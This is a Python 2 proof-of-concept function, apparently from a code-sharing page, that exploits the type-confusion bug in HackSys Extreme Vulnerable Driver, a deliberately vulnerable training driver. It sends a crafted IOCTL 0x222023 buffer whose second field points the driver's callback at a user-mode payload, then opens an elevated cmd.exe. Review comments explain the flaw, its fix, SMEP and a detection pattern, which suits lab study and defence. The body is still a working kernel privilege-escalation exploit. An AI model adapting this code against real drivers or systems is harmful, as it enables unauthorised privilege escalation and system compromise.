def trigger_type_confusion():
    """Send a crafted USER_TYPE_CONFUSION_OBJECT to the HEVD training driver.

    Proof-of-concept for the type-confusion bug in HackSys Extreme Vulnerable
    Driver, a deliberately vulnerable driver meant for lab machines. The
    function opens the driver's device, builds an 8-byte input buffer, sends
    it with IOCTL 0x222023, then checks whether the process is an
    administrator and, if so, starts cmd.exe.

    Takes no arguments and returns nothing. Calls sys.exit() when the device
    cannot be opened. Relies on names defined outside this block: kernel32,
    shell, heap_alloc_payload, c_ulong, byref, ctypes, struct, sys, os.

    Python 2 only (print statements; str is a byte string).
    """
    # Receives the byte count DeviceIoControl reports; never read afterwards.
    dwReturn = c_ulong()
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    # NOTE(review): any user who can open this device can reach the IOCTL
    # below; on a real driver the device ACL is the first line of defence.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    # 0/None or -1 (INVALID_HANDLE_VALUE) both mean the open failed.
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        # NOTE(review): sys.exit() with no argument reports success (status 0)
        # even though this is the failure path.
        sys.exit()
    ####
    # Layout of the user-supplied input the driver expects:
    # typedef struct _USER_TYPE_CONFUSION_OBJECT {
    # ULONG ObjectID;
    # ULONG ObjectType;
    # } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT;
    #
    # NOTE(review): per HEVD's published source, the kernel-side copy overlays
    # ObjectType with a callback pointer in a union and calls it without
    # setting it first - confirm against the driver version in use. The fix
    # belongs in the driver: never let a caller-controlled field alias a
    # function pointer, and initialise the callback before it is invoked.
    ####
    print "[+] Constructing USER_TYPE_CONFUSION_OBJECT"
    # ObjectID = four 0x41 filler bytes; ObjectType = the 32-bit little-endian
    # value returned by heap_alloc_payload() (defined elsewhere; presumably the
    # address of a user-mode payload buffer - verify). "<L" is 4 bytes wide, so
    # this targets a 32-bit system.
    # NOTE(review): if that address is user-mode memory, SMEP on the target
    # blocks the kernel from executing it - confirm the lab VM's settings.
    evil_input = "\x41" * 4 + struct.pack("<L",heap_alloc_payload())
    # id() is the object's address in CPython; +20 is presumably the offset of
    # the character data inside a 32-bit CPython 2 str object - TODO confirm.
    # This is interpreter- and architecture-dependent and is not a supported
    # way to obtain a buffer address.
    evil_input_ptr = id(evil_input) + 20
    evil_size = len(evil_input)
    print "[+] Buf size: %d" % evil_size
    print "[+] Sending confusion object"
    print "[+] Triggering vuln .."
    # Input buffer only; no output buffer (None, 0) and no OVERLAPPED.
    # NOTE(review): the BOOL result in dev_ioctl is never checked, so a failed
    # call is indistinguishable from a successful one at this point.
    dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222023, evil_input_ptr, evil_size, None, 0,byref(dwReturn) , None)
    # NOTE(review): IsUserAnAdmin() is also true when the script was started
    # from an already-elevated prompt, so this check alone does not prove the
    # IOCTL changed the process's privileges.
    # For detection: a cmd.exe child whose token is more privileged than its
    # parent's logon session, following a DeviceIoControl to a third-party
    # driver device, is the observable pattern here.
    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[!] Exploit did not work. Re-run it!"
    # NOTE(review): driver_handle is never closed on any path through this
    # function.
HEVD_typeconfusion.py 文件源码